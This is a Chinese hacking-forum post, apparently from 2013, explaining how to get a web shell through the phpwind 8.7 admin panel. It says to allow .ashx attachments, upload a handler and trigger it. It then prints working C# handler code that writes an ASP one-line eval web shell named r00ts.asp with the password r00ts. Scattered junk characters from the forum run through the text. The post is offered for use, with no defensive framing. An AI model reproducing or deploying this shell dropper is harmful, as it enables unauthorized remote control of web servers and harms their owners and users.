找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2091|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
3 K, x' l7 k; j' B9 j/ T ; `+ r: m" n* `9 u
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx5 ^9 U& x" Z' L& v
* Q3 L4 U  ?, k  k! }! h
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
# E9 W7 M$ h- o' r! y2 f, I $ w# m4 e* B% R+ c  m
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
5 l& J- b& F! R9 D : V& e$ o% d3 j" N" H& |1 ]
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts# o1 c) y" E- E+ Q! b5 T6 }2 L& J

/ h  s' t: Z9 y9 h下面是代码:8 b' L# y  j% x& s2 P# H
! r3 {0 M, H7 J3 p
<%@ WebHandler Language="C#"Class="Handler" %>) v% Z6 j7 [# E% m/ \$ d- M$ ^, e
using System;$ @* U, A1 t4 n- F% |6 I! E- ]
using System.Web;! p, {1 c. \) C! ]& \: K
using System.IO;$ w/ i  ]# }5 L) w! [* \
public class Handler : IHttpHandler {; C$ C) U* U# E. {+ S
public void ProcessRequest (HttpContext context) {
6 Q; I  [: }( G3 Xcontext.Response.ContentType = "text/plain";
4 b8 R! c6 D0 G! I+ H  YStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));; C6 |% z0 N& C
file1.Write("<%eval request(\"r00ts\")%>");
. }7 a0 h. |' Ifile1.Flush();: |' ]: d& v) O7 }8 ?4 O* _! ~* a
file1.Close();+ N9 m5 k& r$ X
}( i4 w5 }5 n* `
public bool IsReusable {
: _8 }+ Y4 l% _+ Mget {
4 Y1 t6 r$ P+ ~7 ]8 T: q# l/ Sreturn false;: O4 E1 l+ j/ ]' L& l
}
0 u# p8 A5 s& O$ q# [}3 f* g* J* R9 D2 H8 \1 X$ b$ z9 W) U
}
& v8 R- K/ R; A" b/ k; x7 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表